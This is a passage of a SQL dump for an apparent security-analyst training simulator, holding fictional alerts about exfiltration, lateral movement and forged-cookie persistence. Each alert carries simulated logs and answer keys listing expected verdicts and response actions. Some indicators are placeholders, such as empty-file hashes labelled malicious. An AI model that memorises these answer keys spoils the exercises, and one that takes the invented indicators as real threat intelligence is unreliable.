4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1012, 'Lateral Movement Detected Across Network', 'high', 'Network Monitoring Tools', 'Anomalous lateral movement detected on the network. User \'jbinns\' accessed multiple hosts in search of sensitive databases. Network monitoring tools identified suspicious access patterns originating from an internal IP linked to potential data exfiltration activities.', 'Lateral Movement', 'T1071 - Application Layer Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T15:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.22\",\"user\":\"jbinns\",\"action\":\"network_access\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\192.168.1.22\\\\sensitive_data\\\\customer_info.db\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"external_ip\":\"203.0.113.45\",\"alert_id\":\"ALRT-2098\",\"description\":\"User \'jbinns\' accessed a host using SMB protocol and attempted to access a database containing customer information.\"}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user \'jbinns\' for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to previous APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jbinns\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1013, 'Massive Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'In the final phase of a coordinated exfiltration operation, 54 million customer records were extracted and sent to an external IP. The data is expected to be sold on underground forums. Immediate action is required to prevent further data loss.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"customer_data_2023.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"action\":\"transferred\",\"bytes_transferred\":54000000,\"alert_id\":\"DLP-EXFIL-001\",\"status\":\"Confirmed\"}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with recent exfiltration operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Employee in good standing.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1014, 'Suspicious Access Patterns Detected', 'high', 'Security Information and Event Management (SIEM)', 'Initial reports of abnormal login attempts hint at compromised credentials, marking the beginning of the breach. Multiple failed login attempts followed by a successful login from an unfamiliar IP address indicate potential credential theft.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"status\":\"Failed\",\"failure_reason\":\"Invalid password\",\"login_method\":\"Remote Desktop Protocol (RDP)\",\"related_event_id\":\"4624\",\"related_timestamp\":\"2023-10-12T14:24:10Z\",\"related_status\":\"Success\",\"related_source_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_payload.exe\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File linked to unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1015, 'Forged Cookie Generation Detected', 'critical', 'Network Forensics Tools', 'Attackers have been detected generating forged cookies by leveraging compromised systems. These cookies allow unauthorized account access without requiring passwords.', 'Execution', 'T1556.004', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"file_name\":\"cookie_forge.exe\",\"file_hash\":\"c3ab8ff13720e8ad9047dd39466b3c89\",\"user\":\"compromised_user\",\"process_id\":4521,\"malicious_ip\":\"203.0.113.45\",\"event\":\"Forged Cookie Generation\",\"description\":\"A forged cookie was generated to enable access to user accounts without password authentication.\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP from internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for unauthorized access\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c3ab8ff13720e8ad9047dd39466b3c89\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with cookie forging malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cookie_forge.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable involved in generating forged cookies\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1016, 'Persistence Mechanisms Activated', 'high', 'Endpoint Detection and Response (EDR)', 'Persistent access is established by embedding forged cookies across multiple sessions, evading detection.', 'Persistence', 'T1502 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:58Z\",\"event_id\":\"EDR-0723\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"file_created\":\"C:\\\\Windows\\\\Temp\\\\splunkcookie.tmp\",\"malware_hash\":\"3f1a5d2c3e9f8b0d6a6c3b1f4e7d9a5b\",\"event_description\":\"Suspicious temporary file creation detected. Potential malicious cookie implantation observed.\",\"file_integrity_check\":\"Failed\",\"process_name\":\"powershell.exe\",\"process_id\":3456,\"persistence_technique\":\"Forged cookies\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account but potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file creation indicative of persistence techniques.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1a5d2c3e9f8b0d6a6c3b1f4e7d9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in persistence mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1017, 'Lateral Movement Across Accounts', 'high', 'User Behavior Analytics (UBA)', 'The attackers are performing lateral movement, targeting accounts of journalists and other high-value individuals in an attempt to expand their influence.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"user\":\"jdoe\",\"target_accounts\":[\"journalist1@news.com\",\"editor@media.org\"],\"malware_filename\":\"APT29_toolkit.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_attempt\",\"status\":\"success\",\"extra_info\":{\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"abc123xyz\",\"external_references\":[\"https://threatintel.report/apt29\"]}}', '2026-01-17 03:50:17', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account usage patterns inconsistent with typical behavior.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:31:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:30:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 